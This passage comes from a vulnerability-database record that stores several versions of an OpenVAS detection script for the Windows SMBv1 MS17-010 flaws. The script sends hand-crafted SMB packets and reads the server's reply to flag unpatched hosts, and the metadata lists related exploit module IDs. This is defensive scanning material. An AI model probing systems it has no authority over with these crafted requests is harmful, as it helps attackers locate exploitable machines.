0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02,\n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c,\n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 7, "lastseen": "2019-05-29T18:34:28"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "a3447e850d22905839987fef587d9ffcf354da8c08bcd9df76da0565dac23375", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-09-01T23:43:34", "history": [], "viewCount": 13, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010_remote.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\n\n Impact Level: System\");\n\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_resp = \"\";\nsmb_sess_andx_resp = \"\"; \nsmb_trans_resp = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n 
exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) + \n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42, \n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00, \n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02, \n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c, \n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{ \n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\t\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:43:34"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "244d68ec657b636c86fe57a1aa696cdc6a6f8d8103247a890e61e5e5926f6e81", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-05-06T14:30:35", "history": [], "viewCount": 26, "enchantments": {"dependencies": {"modified": "2019-05-06T14:30:35", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": 
["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": 
["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the 
response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = 